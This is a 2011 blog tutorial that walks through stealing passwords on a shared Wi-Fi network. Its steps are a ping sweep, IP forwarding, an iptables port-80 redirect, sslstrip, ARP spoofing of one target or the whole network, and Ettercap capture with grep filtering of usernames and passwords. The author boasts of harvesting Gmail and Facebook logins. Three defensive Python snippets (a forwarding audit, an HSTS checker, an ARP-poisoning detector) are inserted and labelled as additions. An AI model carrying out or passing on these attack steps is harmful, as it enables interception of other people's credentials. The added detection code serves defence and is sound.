Monday, July 25, 2011

Sniffing Passwords Over a Wifi Connection [Linux]

Now here's where some fun stuff starts!
I hope many of you have followed my Backtrack 5 installation guide and have read up on what ARP is as well as basic Linux commands, so you can follow along easily; if not, go read those now!

What you'll need for this tutorial:

If you don't have any of these, follow the links and set up your system before continuing.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and to redirect secure HTTPS connections to insecure HTTP connections, which helps us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Be warned, this is a beta post, so it will be quite simple and unexplained, which might make it hard to follow for newer Netsec and Linux users. I'll try to make it as easy to understand as possible in the future.

Let's begin:
  • First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.1.1 depending on the network)
    • You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or copy and paste a hand-written script that I created:

      #!/bin/bash
      # bash is needed here: the {0..1} brace expansion below does not work under /bin/sh

      echo "Computers connected to your network:"
      for dom in {0..1}; do        # outer loop over the third octet (widen both ranges, e.g. {0..255}, to sweep a whole /16)
        for ip in {0..1}; do       # inner loop over the last octet
          ping -c 1 -W 1 192.168.$dom.$ip >>ips.tmp &   # pings each IP in range (1 s timeout) and appends the reply to "ips.tmp"
        done                       # finishes the inner loop
      done                         # finishes the outer loop
      wait                         # wait for every background ping to finish before reading the results

      cat ips.tmp |grep "bytes from" |cut -d" " -f4 |cut -d: -f1 >>ips2.tmp   # keeps only the addresses that replied and places them in "ips2.tmp"

      cat ips2.tmp   # outputs that information

      rm ips.tmp ips2.tmp   # cleans up temp files


      Copy this into a file called "pingscan.sh" and run the command "chmod 775 pingscan.sh" to make it executable.
      Then you can run it with the command "./pingscan.sh" and it should output all connected IPs. The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.
      You can figure out which one is yours by running our good old friend "ifconfig" and looking at your IP address. The remaining ones are other computers, and you can choose which one you wish to directly sniff.
      This is a simple script that I wrote to ping the nodes in your network; you can extend it further, for example by nmapping the nodes it finds. I will write a post soon about this script and we will add more cool and interesting features to it to suit our needs.
  • Next, we have to switch our computer into "forwarding" mode, which allows it to forward packets along to other computers. Issue the command (as root) "echo 1 > /proc/sys/net/ipv4/ip_forward", which writes "1" (true, or allow, in computer language) into the file "ip_forward" using the ">" redirection operator.

  • Next, we have to set up "iptables" to redirect HTTP (normal, port 80) traffic to our program, sslstrip.
     Issue the command "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666"

     I'm using port 666 because it's easy to remember, but you can use any port that isn't already in use. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is 80. I'll explain the rest later, so don't worry if it doesn't make sense yet; just check back later!
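A defender's counterpart to these two steps, as an added example that is not from the original post: a small Python audit that reports when a Linux host has IPv4 forwarding switched on and a PREROUTING REDIRECT of port 80 loaded, which together are the footprint of the relay configured above. The iptables text is a constructed sample in the format of `iptables -t nat -S`; `audit_live_host` is an assumed helper that reads the real values and needs Linux and root.

```python
"""Audit a Linux host for IPv4 forwarding plus a port-80 REDIRECT in the nat table.
Added example (not from the original post). The sample rules are constructed."""
import re

# Constructed sample of `iptables -t nat -S` output, as the post's rule looks once loaded.
SAMPLE_NAT_RULES = """\
-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 666
"""

# Matches a PREROUTING rule that redirects a TCP destination port to a local port.
REDIRECT_RE = re.compile(
    r'^-A PREROUTING .*-p tcp .*--dport (\d+) .*-j REDIRECT --to-ports (\d+)')


def forwarding_enabled(ip_forward_contents):
    """True when the contents of /proc/sys/net/ipv4/ip_forward read "1"."""
    return ip_forward_contents.strip() == "1"


def find_port_redirects(nat_rules):
    """Return (dport, to_port) pairs for every PREROUTING REDIRECT rule in the text."""
    hits = []
    for line in nat_rules.splitlines():
        m = REDIRECT_RE.match(line.strip())
        if m:
            hits.append((int(m.group(1)), int(m.group(2))))
    return hits


def mitm_relay_indicators(ip_forward_contents, nat_rules):
    """Findings a defender would flag: forwarding on, and HTTP bent to a local port."""
    findings = []
    if forwarding_enabled(ip_forward_contents):
        findings.append("ipv4 forwarding is enabled")
    for dport, to_port in find_port_redirects(nat_rules):
        findings.append(f"tcp/{dport} is redirected to local port {to_port}")
    return findings


def audit_live_host():
    """Assumed helper: read the real values (Linux only, iptables needs root)."""
    import subprocess
    with open("/proc/sys/net/ipv4/ip_forward") as f:
        fwd = f.read()
    rules = subprocess.run(["iptables", "-t", "nat", "-S"],
                           capture_output=True, text=True, check=True).stdout
    return mitm_relay_indicators(fwd, rules)


if __name__ == "__main__":
    # Runs against the constructed sample; call audit_live_host() on a real box.
    for finding in mitm_relay_indicators("1\n", SAMPLE_NAT_RULES):
        print("finding:", finding)
```

Neither setting is wrong on its own (routers forward, transparent proxies redirect), so the value is in the pair showing up on a host that is supposed to be a plain client.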

  • Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (insecure) connections. The name SSLStrip is quite perfect, eh?

     To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
    This runs the Python script that starts the program. Python is a scripting language like Perl or Ruby, and we will learn more about it in the future. If you're interested in Netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

    Don't close this terminal.
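The reason the stripping above works is that the browser's very first request to a site usually goes out over plain HTTP, and the link to the HTTPS login page can be rewritten on the way back. The browser-side fix is HSTS (the Strict-Transport-Security response header): once a browser has seen it from a host over HTTPS, or has the host on its preload list, it rewrites http:// to https:// itself and never sends the downgradable request. As an added example that is not from the original post, this Python snippet parses the header out of a raw response and says whether, and how completely, a site is covered. The two response blocks are constructed, not captured from any real site.

```python
"""Assess a site's HSTS policy from its raw response headers.
Added example (not from the original post); the header blocks are constructed."""
import re

# Constructed raw responses (CRLF-terminated, as on the wire).
WITH_HSTS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\r\n"
    "\r\n"
)
WITHOUT_HSTS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

ONE_YEAR = 31536000  # minimum max-age the preload list requires


def parse_headers(raw):
    """Turn a raw header block into a dict of lower-cased names (first value wins)."""
    headers = {}
    for line in raw.split("\r\n")[1:]:  # skip the status line
        if not line:                    # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return headers


def parse_hsts(value):
    """Parse the directives of a Strict-Transport-Security value (RFC 6797)."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        d = directive.strip().lower()
        if d.startswith("max-age="):
            # max-age may be quoted; keep the digits only
            digits = re.sub(r"[^0-9]", "", d.split("=", 1)[1])
            policy["max_age"] = int(digits or 0)
        elif d == "includesubdomains":
            policy["include_subdomains"] = True
        elif d == "preload":
            policy["preload"] = True
    return policy


def hsts_assessment(raw_response):
    """Return (protected, weaknesses) for the given response."""
    headers = parse_headers(raw_response)
    value = headers.get("strict-transport-security")
    if value is None:
        return False, ["no Strict-Transport-Security header: a visit starting on http:// can be downgraded"]
    policy = parse_hsts(value)
    if policy["max_age"] is None or policy["max_age"] <= 0:
        return False, ["max-age missing or zero: the policy is not cached by the browser"]
    weaknesses = []
    if policy["max_age"] < ONE_YEAR:
        weaknesses.append("max-age shorter than one year (preload requires at least that)")
    if not policy["include_subdomains"]:
        weaknesses.append("subdomains not covered")
    if not policy["preload"]:
        weaknesses.append("not marked for preload: the very first visit is still unprotected")
    return True, weaknesses


if __name__ == "__main__":
    for label, raw in (("with HSTS", WITH_HSTS), ("without HSTS", WITHOUT_HSTS)):
        print(label, hsts_assessment(raw))
```

The header only helps once the browser has cached it, so a site that sets HSTS but is not preloaded still leaves the first-ever visit exposed to exactly the downgrade this post performs; that is what the last weakness reports.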

  • We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
    Open a new terminal now for our ARP spoofing, and run the command:
    "arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]"

     When I'm arp-spoofing my computer from my laptop, my command is "arpspoof -i wlan0 -t 192.168.0.111 192.168.0.1"

    If you want to arp-spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP]".
    Thanks to Volvox for the above hint, but watch out, because if your computer can't handle all the redirecting the network requires, it will DoS (denial of service) the network.

    Don't close this terminal.
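What the poisoning above looks like from the other side, as an added example that is not from the original post: the target's (or a monitoring host's) neighbour table ends up with the gateway IP resolving to a MAC that also belongs to another machine, and the gateway's MAC differs from what it was a moment ago. This Python snippet parses `ip neigh show` style text and reports both symptoms. The two snapshots are constructed; the MACs are made up, and the addresses reuse the post's own example of 192.168.0.1 as gateway and 192.168.0.111 as target, with 192.168.0.50 as the constructed machine whose MAC turns up on the gateway entry.

```python
"""Spot ARP-poisoning symptoms in `ip neigh show` output.
Added example (not from the original post); snapshots are constructed."""
import re
from collections import defaultdict

# Entries without lladdr (e.g. FAILED) carry no MAC and are ignored on purpose.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<state>\S+)$", re.I)

# Constructed baseline taken while the network is clean.
CLEAN = """\
192.168.0.1 dev wlan0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.0.50 dev wlan0 lladdr 00:11:22:33:44:50 STALE
192.168.0.111 dev wlan0 lladdr 00:11:22:33:44:aa REACHABLE
"""
# Constructed snapshot after the gateway entry has been poisoned:
# 192.168.0.1 now resolves to the MAC that also belongs to 192.168.0.50.
POISONED = """\
192.168.0.1 dev wlan0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.0.50 dev wlan0 lladdr 00:11:22:33:44:50 STALE
192.168.0.111 dev wlan0 lladdr 00:11:22:33:44:aa REACHABLE
"""


def parse_neigh(text):
    """Map ip -> mac (lower-cased) for every resolved entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def shared_macs(table):
    """MACs that answer for more than one IP: the classic poisoning footprint."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(baseline, current, gateway_ip):
    """True when the gateway's MAC differs from the trusted baseline."""
    before, after = baseline.get(gateway_ip), current.get(gateway_ip)
    return before is not None and after is not None and before != after


def arp_findings(baseline_text, current_text, gateway_ip):
    """Human-readable findings comparing a current snapshot against a baseline."""
    baseline, current = parse_neigh(baseline_text), parse_neigh(current_text)
    findings = []
    if gateway_changed(baseline, current, gateway_ip):
        findings.append(f"gateway {gateway_ip} moved from "
                        f"{baseline[gateway_ip]} to {current[gateway_ip]}")
    for mac, ips in shared_macs(current).items():
        findings.append(f"{mac} claims {', '.join(ips)}")
    return findings


if __name__ == "__main__":
    # On a real host, feed the output of `ip neigh show` in place of the samples.
    for finding in arp_findings(CLEAN, POISONED, "192.168.0.1"):
        print("finding:", finding)
```

A periodic diff like this is the poor man's version of what tools such as arpwatch do continuously; on managed switches, Dynamic ARP Inspection stops the forged replies before they reach the victim, and a static ARP entry for the gateway on a sensitive host makes the cache immune to them.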

  • Now open another terminal and let's start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie-like and is easier to navigate and issue commands in).

    Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

    I forgot to mention: to see the packets in the Ettercap text interface, you have to press the space bar to turn packet display on. Do this, and then if there's any browsing on the target computer, you should see packets start appearing rapidly across your screen.
    Hopefully you're doing this legally on your own network so you can test this out... Open up a browser on your target computer, go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this won't be noticeable). Log in with your credentials and you should see something pop up in your Ettercap that looks like a packet from Gmail. If it's scrolling too fast (which happens), then don't worry, I'll show you how to open up your file.

  • Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
     Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
    Lets clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
    The quotation marks after the d are part of the command, but of course the ones surrounding the entire command are not.
    You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.
Again, this is a first beta post that I just wanted to get out; I'll be updating it frequently with more information and work-arounds so don't worry if it's not working right away! Post below if you have any issues so I can add it in, too! 
